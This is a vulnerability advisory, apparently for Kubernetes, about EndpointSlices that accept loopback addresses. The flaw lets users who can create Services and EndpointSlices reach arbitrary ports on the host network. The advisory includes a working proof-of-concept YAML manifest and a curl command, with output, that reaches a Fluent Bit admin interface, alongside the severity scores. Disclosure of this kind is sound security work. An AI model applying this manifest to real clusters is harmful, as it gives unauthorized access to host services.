4.8 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
4.9 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:S/C:P/I:P/A:N
0.001 Low
EPSS
Percentile
23.6%
A user with permission to create Services and EndpointSlices can configure these resources to allow sending traffic to arbitrary ports in the host network.
Any version with EndpointSliceProxying
enabled, default in 1.19+
1.19+
Apply YAML:
apiVersion: v1
kind: Service
metadata:
labels:
component: apiserver
name: hijack
namespace: attacker
spec:
ports:
- name: http
port: 2020
protocol: TCP
---
addressType: IPv4
apiVersion: discovery.k8s.io/v1beta1
endpoints:
- addresses:
- 127.0.0.1
conditions:
ready: true
kind: EndpointSlice
metadata:
labels:
kubernetes.io/service-name: hijack
name: hijack
namespace: attacker
ports:
- name: http
port: 2020
protocol: TCP
Inside a pod in the cluster, send a curl request to the service:
$ curl hijack.attacker:2020/api/v1/uptime
{"uptime_sec":57070,"uptime_hr":"Fluent Bit has been running: 0 day, 15 hours, 51 minutes and 10 seconds"}
Here I chose to reach the Fluent Bit admin interface running on port 2020 in the host network; any other services can also be hit by adding the port into the Service and EndpointSlice.
This vulnerability does not apply to Endpoints, which would reject this in validation: https://github.com/kubernetes/kubernetes/blob/a651804427dd9a15bb91e1c4fb7a79994e4817a2/pkg/apis/core/validation/validation.go#L5762.
However, EndpointSlice validation is more lenient: https://github.com/kubernetes/kubernetes/blob/a651804427dd9a15bb91e1c4fb7a79994e4817a2/staging/src/k8s.io/apimachinery/pkg/util/validation/validation.go#L356
User with permission to create Services and EndpointSlice, a relatively unprivileged role, can access arbitrary services in the host network.
4.8 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
4.9 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:S/C:P/I:P/A:N
0.001 Low
EPSS
Percentile
23.6%